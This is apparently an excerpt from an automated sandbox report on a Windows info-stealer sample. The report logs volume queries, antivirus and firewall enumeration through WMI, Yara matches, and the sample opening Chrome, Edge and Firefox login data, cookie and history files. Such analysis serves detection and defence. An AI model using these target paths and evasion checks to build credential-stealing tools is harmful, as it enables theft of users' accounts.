                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Queries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeQueries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeQueries volume information: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9XHFe6y4Dj.exe PID: 6400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 9XHFe6y4Dj.exe PID: 8812, type: MEMORYSTR
Source: Yara match | File source: 9XHFe6y4Dj.exe, type: SAMPLE
Source: Yara match | File source: 0.0.9XHFe6y4Dj.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, type: DROPPED
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
